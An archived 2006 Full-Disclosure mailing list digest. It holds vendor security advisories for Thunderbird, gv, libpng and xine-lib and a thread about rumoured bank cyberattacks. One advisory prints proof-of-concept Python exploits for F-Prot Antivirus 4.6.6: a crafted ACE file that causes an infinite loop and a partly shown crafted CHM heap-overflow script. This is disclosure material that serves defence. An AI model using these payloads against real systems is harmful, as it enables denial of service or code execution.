Thunderbird packages fix several vulnerabilities Message-ID: <20061204081459.59678FDE1@finlandia.home.infodrom.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1227-1 security at debian.org http://www.debian.org/security/ Martin Schulze December 4th, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : mozilla-thunderbird Vulnerability : several Problem type : remote Debian-specific: no CVE IDs : CVE-2006-4310 CVE-2006-5462 CVE-2006-5463 CVE-2006-5464 CVE-2006-5748 CERT advisories: VU#335392 VU#390480 VU#495288 VU#714496 BugTraq IDs : 19678 20957 Several security related problems have been discovered in Mozilla and derived products such as Mozilla Thunderbird. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-4310 Tomas Kempinsky discovered that malformed FTP server responses could lead to denial of service. CVE-2006-5462 Ulrich K?hn discovered that the correction for a cryptographic flaw in the handling of PKCS-1 certificates was incomplete, which allows the forgery of certificates. CVE-2006-5463 "shutdown" discovered that modification of JavaScript objects during execution could lead to the execution of arbitrary JavaScript bytecode. CVE-2006-5464 Jesse Ruderman and Martijn Wargers discovered several crashes in the layout engine, which might also allow execution of arbitrary code. CVE-2006-5748 Igor Bukanov and Jesse Ruderman discovered several crashes in the JavaScript engine, which might allow execution of arbitrary code. This update also adresses several crashes, which could be triggered by malicious websites and fixes a regression introduced in the previous Mozilla update. For the stable distribution (sarge) these problems have been fixed in version 1.0.4-2sarge13. For the unstable distribution (sid) these problems have been fixed in the current icedove package 1.5.0.8. We recommend that you upgrade your mozilla-thunderbird package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1.dsc Size/MD5 checksum: 1003 6c5f746adeacacdf3127e17cb2aa8bee http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1.diff.gz Size/MD5 checksum: 529889 28823ccf3573c2dd660fd9d9e3e22b09 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2.orig.tar.gz Size/MD5 checksum: 33288906 806175393a226670aa66060452d31df4 Alpha architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_alpha.deb Size/MD5 checksum: 12856976 84bc9994e2d58b31b25e2bd069d1def3 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_alpha.deb Size/MD5 checksum: 3280854 caa0d6f973d08d3f2b35e52254b00c2d http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_alpha.deb Size/MD5 checksum: 152698 d9fdc6a19105ddd536acd60a8ee2ab37 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_alpha.deb Size/MD5 checksum: 34122 cafae516210656d77a176415fb8db6f4 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_alpha.deb Size/MD5 checksum: 90116 699b3712455d642e224b54c926328a4c AMD64 architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_amd64.deb Size/MD5 checksum: 12259294 289d4d588a4c47385220edb78c04afae http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_amd64.deb Size/MD5 checksum: 3282040 f4c6b066917601dad180472abf540098 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_amd64.deb Size/MD5 checksum: 151728 58934099903d70e9299390ea13f59df5 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_amd64.deb Size/MD5 checksum: 34120 08a6bedf50fe0457cbce271965871b47 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_amd64.deb Size/MD5 checksum: 89962 ba63d212aa7a4aeed16ed0f2d80d6a86 ARM architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_arm.deb Size/MD5 checksum: 10345710 e715702c5b2aa723f9d25802287e94e4 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_arm.deb Size/MD5 checksum: 3273096 cce5d1fd85a8409b4af4ff6f7968e9d2 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_arm.deb Size/MD5 checksum: 143868 8a3036032e81ef1010e3a3162725a818 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_arm.deb Size/MD5 checksum: 34132 f2ab43ddc5f063963bef4e1ff6d9c956 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_arm.deb Size/MD5 checksum: 81934 ae1ce06ee154fb9e85fea35aaf5311fc HP Precision architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_hppa.deb Size/MD5 checksum: 13571836 d5c2bbb909b9d6be2ca180f14c307f1e http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_hppa.deb Size/MD5 checksum: 3285646 5c9f816a25d33453f59179991ea74d0d http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_hppa.deb Size/MD5 checksum: 153926 4f22d429a7781c9f09b4edb68816c853 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_hppa.deb Size/MD5 checksum: 34134 cae400c43c5f0f5e0e276a047dbdab20 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_hppa.deb Size/MD5 checksum: 97998 bf0c11bb906656980cc4e5744eb464bd Intel IA-32 architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_i386.deb Size/MD5 checksum: 11549564 41a015e8acb35a566e733d5e3efbd26f http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_i386.deb Size/MD5 checksum: 3279334 7f4340a3a8a8194a7e99bd818866c57e http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_i386.deb Size/MD5 checksum: 147232 ad62baa206ff857d41db06fc9985881e http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_i386.deb Size/MD5 checksum: 34122 463263b2b57ed86dcde4f3bb458d0cf7 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_i386.deb Size/MD5 checksum: 88704 427bbd7d9754931c19829bc21096553d Intel IA-64 architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_ia64.deb Size/MD5 checksum: 14632100 53cd255c1673064d35138b4ddd9a00dd http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_ia64.deb Size/MD5 checksum: 3291608 e4d9bf2df8ae5a7ca3730f12409fe836 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_ia64.deb Size/MD5 checksum: 156062 a264399ce67bcfef3823da09effe603f http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_ia64.deb Size/MD5 checksum: 34120 beeb92a784afcee38f2ea9c5a5747a8c http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_ia64.deb Size/MD5 checksum: 107826 ce5eb8ae242c1e3ae2de7b2dd4638086 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_m68k.deb Size/MD5 checksum: 10795348 67b697071cc0d1f5667c6ed7464e90f7 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_m68k.deb Size/MD5 checksum: 3272426 d1a76c3cc4d53d311d4fa2933fa241aa http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_m68k.deb Size/MD5 checksum: 145646 bb4e9eed4d5639080ad0f40d4b9ccd3e http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_m68k.deb Size/MD5 checksum: 34148 7a167f58be69a5f87ae0b6ff696c195b http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_m68k.deb Size/MD5 checksum: 83168 00b7c01b14e69d3de5b716a97b531135 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_mips.deb Size/MD5 checksum: 11949608 9ec9db79429dda4d407ccf88ccdcd432 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_mips.deb Size/MD5 checksum: 3280190 9c5196972a3cf0c2c526f858aca2466e http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_mips.deb Size/MD5 checksum: 148640 5797fb7d9315c3143f3764f6b6f85c25 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_mips.deb Size/MD5 checksum: 34124 cb575700d4f03213414e5723de4f71e3 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_mips.deb Size/MD5 checksum: 85368 0ac0335d952db222dd2cabb47aebaf93 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_mipsel.deb Size/MD5 checksum: 11817496 aba31a9b55e305979548c2bc354d25b8 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_mipsel.deb Size/MD5 checksum: 3281036 ad64af4aa0945eb30474881150f19368 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_mipsel.deb Size/MD5 checksum: 148210 efb0d8070713c0392b4bf515df28b2a2 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_mipsel.deb Size/MD5 checksum: 34122 7506a7d0d2452a5aa57a8e729a129afe http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_mipsel.deb Size/MD5 checksum: 85264 a660f1051091732b2b827a25169bcd13 PowerPC architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_powerpc.deb Size/MD5 checksum: 10913258 2b2bc733b1a9c582846a35e09f790792 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_powerpc.deb Size/MD5 checksum: 3270832 f0971f53b8576629a543e31b13b5fc82 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_powerpc.deb Size/MD5 checksum: 145640 b0f543ffae409f9c2ed5feb623d9ccc9 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_powerpc.deb Size/MD5 checksum: 34126 d00d244fff67496236b40c606eb2b068 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_powerpc.deb Size/MD5 checksum: 82090 08904221a4f22160c5448adc5e584892 IBM S/390 architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_s390.deb Size/MD5 checksum: 12706338 9cff7d191572124759121b992f9fcbbe http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_s390.deb Size/MD5 checksum: 3281302 32b6910f4a3352602eb5f2fba6496b5c http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_s390.deb Size/MD5 checksum: 152014 b85e247ddc89da9251bc96237bc496cb http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_s390.deb Size/MD5 checksum: 34118 34fa6f63472be37d37e23ce669dc9ae3 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_s390.deb Size/MD5 checksum: 89892 c8e4543a63614010de56776b5b597006 Sun Sparc architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_sparc.deb Size/MD5 checksum: 11182150 3728f5afbe35203ae332876bc1804866 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_sparc.deb Size/MD5 checksum: 3276596 305ba0ef1c0dec7b7057af38507a981b http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_sparc.deb Size/MD5 checksum: 145322 6799c906fa439170521396913ba7092a http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_sparc.deb Size/MD5 checksum: 34118 4ac987cbe24509923ed7cf89c78995dc http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_sparc.deb Size/MD5 checksum: 83734 191466ecaad65e7781192a118749fc45 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFc9kCW5ql+IAeqTIRAlWUAJ4yg4SG/SCLzd///G08uHiPjnxtiACgqN6r iMNDIuBp0otB0CAnhO2A2Cw= =otNU -----END PGP SIGNATURE----- From research at gleg.net Mon Dec 4 13:48:59 2006 From: research at gleg.net (research at gleg.net) Date: Mon, 4 Dec 2006 16:48:59 +0300 Subject: [Full-disclosure] F-Prot Antivirus for Unix: heap overflow and Denial of Service Message-ID: <1165240139.4574274b9c2fa@cp55.agava.net> Name: F-Prot Antivirus for Unix: heap overflow and Denial of Service Vendor: http://www.f-prot.com Release date: 4 Dec, 2006 URL: http://gleg.net/fprot.txt Author: Evgeny Legerov I. DESCRIPTION Two vulnerabilities in F-Prot Antivirus 4.6.6 for Unix platforms could allow a remote attacker to cause a DoS or execute an arbitrary code. II. DETAILS 1. ACE file Denial of Service When parsing a specially crafted ACE compressed file F-Prot Antivirus will enter in an infinite loop. See fprot1.py for more details. 2. CHM file heap overflow When parsing a specially crafted CHM file a heap overflow will occur in F-Prot Antivirus. See fprot2.py for more details. III. VENDOR RESPONSE Update to F-Prot 4.6.7: http://www.f-prot.com/news/gen_news/061201_release_unix467.html IV. EXPLOITS # fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # # To test this code on Linux: # # create ACE compressed file # $ ./fprot1.py > 1.ace # $ f-prot 1.ace import sys import struct ACE=""" 58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a 55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff 00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00 02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41 41 41 41 41 41 """ s = "" for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]: s += i sys.stdout.write(s) # fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap # overflow # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # # $ ./fprot2.py > 1.chm # $ f-prot 1.chm import sys import struct s="" s+="ITSF" # signature s+=struct.pack(" -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:214-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gv Date : December 4, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Stack-based buffer overflow in the ps_gettext function in ps.c for GNU gv 3.6.2, and possibly earlier versions, allows user-assisted attackers to execute arbitrary code via a PostScript (PS) file with certain headers that contain long comments, as demonstrated using the DocumentMedia header. Packages have been patched to correct this issue. Update: The patch used in the previous update still left the possibility of causing X to consume unusual amounts of memory if gv is used to view a carefully crafted image designed to exploit CVE-2006-5864. This update uses an improved patch to address this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5864 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: 7226199941b3c2bae9d572fa18287cec 2006.0/i586/gv-3.6.1-4.3.20060mdk.i586.rpm cf07ebfa4c2b7b71a12e001ba72074cf 2006.0/SRPMS/gv-3.6.1-4.3.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 2b6d68c47a6774c8b27ad8263ff89f96 2006.0/x86_64/gv-3.6.1-4.3.20060mdk.x86_64.rpm cf07ebfa4c2b7b71a12e001ba72074cf 2006.0/SRPMS/gv-3.6.1-4.3.20060mdk.src.rpm Mandriva Linux 2007.0: 63a4fc9774e298c2c6904ffcce648216 2007.0/i586/gv-3.6.1-7.2mdv2007.0.i586.rpm 17718d7117787714553282997268e4d6 2007.0/SRPMS/gv-3.6.1-7.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: c8c9f156f94c083597a18476760df046 2007.0/x86_64/gv-3.6.1-7.2mdv2007.0.x86_64.rpm 17718d7117787714553282997268e4d6 2007.0/SRPMS/gv-3.6.1-7.2mdv2007.0.src.rpm Corporate 3.0: 7c282139a275fa0886e284649fe84549 corporate/3.0/i586/gv-3.5.8-31.2.C30mdk.i586.rpm ac4f70a00ad3a619a3be53d8f83b3325 corporate/3.0/SRPMS/gv-3.5.8-31.2.C30mdk.src.rpm Corporate 3.0/X86_64: 0844488c9a53873554e7d092ec372889 corporate/3.0/x86_64/gv-3.5.8-31.2.C30mdk.x86_64.rpm ac4f70a00ad3a619a3be53d8f83b3325 corporate/3.0/SRPMS/gv-3.5.8-31.2.C30mdk.src.rpm Corporate 4.0: 09d1689d5390bf63c927b3cce7d5ffa6 corporate/4.0/i586/gv-3.6.1-4.3.20060mlcs4.i586.rpm c5784a887c2c4bce4db77939e2625a01 corporate/4.0/SRPMS/gv-3.6.1-4.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: 0ee8389a3bdcddc68f8814e36924ee09 corporate/4.0/x86_64/gv-3.6.1-4.3.20060mlcs4.x86_64.rpm c5784a887c2c4bce4db77939e2625a01 corporate/4.0/SRPMS/gv-3.6.1-4.3.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFdBfNmqjQ0CJFipgRAoDcAJoChtBsA1NF7nxBpCI+Ie1sZBwadgCgtQBj B8CJCJXv0aZ8HcjT5m8z2Mo= =bJlx -----END PGP SIGNATURE----- From thegesus at gmail.com Mon Dec 4 13:26:21 2006 From: thegesus at gmail.com (TheGesus) Date: Mon, 4 Dec 2006 08:26:21 -0500 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> Message-ID: <5e70f6530612040526q17a13740s4c9118844d7de1d6@mail.gmail.com> On 12/3/06, Dave No, not that one Korn wrote: > TheGesus wrote: > > > More and more people are hearing the recommendation to "withdraw a > > little extra cash out of the banks" to prepare for cyber attacks. If > > as many as 1.32% of bank depositors take their advice and withdraw all > > their money, the banks will close their doors. > > > > Al Qaeda threatens to disrupt the electronic bank payments system. > > And YOU'RE MAKING IT HAPPEN! DUH! > > > This system contributes about 90% of the US money supply. Without it, > > 10% of the money supply (the cash & coin) must take over the work of > > the other 90%. > > > > Conclusion: Withdraw and stockpile some cash now. Shoot for at least > > three months' cash requirements. Don't wait. Start now. > > AQ don't intend to "attack the banking system". They plan to get > paranoids, suckers, and conspiracy-theorists like you to do their dirty work > for them. They just need to spread a rumour and then sit back and watch as > all you "loyal patriots" trash your own country out of fear and cowardice. > > ObTopic: Sounds like a social engineering attack to me; attempting to > manipulate the users of a service into acting as an implicit ddos against > it. > > cheers, > DaveK > -- > Can't think of a witty .sigline today.... > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > I was only quoting (with a little creative editing) the late(?), great(?) Paul Milne of Y2K disaster fame. There's a goldmine in there... http://groups.google.com/groups/search?lr=&safe=off&num=10&q=bank+panic+author%3Apaul+milne&safe=off&qt_s=Search "If you live within 5 miles of a 7-11, you're toast" From announce-noreply at rpath.com Mon Dec 4 17:25:28 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Mon, 04 Dec 2006 12:25:28 -0500 Subject: [Full-disclosure] rPSA-2006-0211-2 doxygen libpng Message-ID: <45745a08.oQikds2tE45+5mJM%announce-noreply@rpath.com> rPath Security Advisory: 2006-0211-2 Published: 2006-11-15 Updated: 2006-12-04 added doxygen to advisory Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect Deterministic Denial of Service Updated Versions: libpng=/conary.rpath.com at rpl:devel//1/1.2.13-0.1-1 doxygen=/conary.rpath.com at rpl:devel//1/1.4.3-6.2-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793 https://issues.rpath.com/browse/RPL-790 https://issues.rpath.com/browse/RPL-824 Description: Previous versions of the libpng package are vulnerable to a denial of service attack when an application that uses libpng attempts to decode certain malformed PNG files. 4 December 2006 Update: previous versions of the doxygen package include internal copies of the libpng and zlib libraries, and the libpng library contained multiple vulnerabilities. The doxygen package has been modified to use system shared libraries for libpng and zlib, resolving these vulnerabilities for doxygen. From zubray at gmail.com Mon Dec 4 20:32:47 2006 From: zubray at gmail.com (Zub By) Date: Mon, 4 Dec 2006 20:32:47 +0000 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: <5e70f6530612040526q17a13740s4c9118844d7de1d6@mail.gmail.com> References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> <5e70f6530612040526q17a13740s4c9118844d7de1d6@mail.gmail.com> Message-ID: <41aa34740612041232w41ff683obfd80db53dea433d@mail.gmail.com> Since when did web servers share resources with the rest of the bank networks? So a bank turns off its online banking system for a few hours for "maintenance", this isn't the end of the world! On 12/4/06, TheGesus wrote: > > On 12/3/06, Dave No, not that one Korn > wrote: > > TheGesus wrote: > > > > > More and more people are hearing the recommendation to "withdraw a > > > little extra cash out of the banks" to prepare for cyber attacks. If > > > as many as 1.32% of bank depositors take their advice and withdraw all > > > their money, the banks will close their doors. > > > > > > Al Qaeda threatens to disrupt the electronic bank payments system. > > > > And YOU'RE MAKING IT HAPPEN! DUH! > > > > > This system contributes about 90% of the US money supply. Without it, > > > 10% of the money supply (the cash & coin) must take over the work of > > > the other 90%. > > > > > > Conclusion: Withdraw and stockpile some cash now. Shoot for at least > > > three months' cash requirements. Don't wait. Start now. > > > > AQ don't intend to "attack the banking system". They plan to get > > paranoids, suckers, and conspiracy-theorists like you to do their dirty > work > > for them. They just need to spread a rumour and then sit back and watch > as > > all you "loyal patriots" trash your own country out of fear and > cowardice. > > > > ObTopic: Sounds like a social engineering attack to me; attempting to > > manipulate the users of a service into acting as an implicit ddos > against > > it. > > > > cheers, > > DaveK > > -- > > Can't think of a witty .sigline today.... > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > I was only quoting (with a little creative editing) the late(?), > great(?) Paul Milne of Y2K disaster fame. > > There's a goldmine in there... > > > http://groups.google.com/groups/search?lr=&safe=off&num=10&q=bank+panic+author%3Apaul+milne&safe=off&qt_s=Search > > "If you live within 5 miles of a 7-11, you're toast" > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061204/170a4fcd/attachment.html From kees at ubuntu.com Mon Dec 4 22:02:10 2006 From: kees at ubuntu.com (Kees Cook) Date: Mon, 4 Dec 2006 14:02:10 -0800 Subject: [Full-disclosure] [USN-392-1] xine-lib vulnerability Message-ID: <20061204220210.GI3984@outflux.net> =========================================================== Ubuntu Security Notice USN-392-1 December 04, 2006 xine-lib vulnerability CVE-2006-6172 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: libxine1c2 1.0.1-1ubuntu10.7 Ubuntu 6.06 LTS: libxine-main1 1.1.1+ubuntu2-7.5 Ubuntu 6.10: libxine1 1.1.2+repacked1-0ubuntu3.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A buffer overflow was discovered in the Real Media input plugin in xine-lib. If a user were tricked into loading 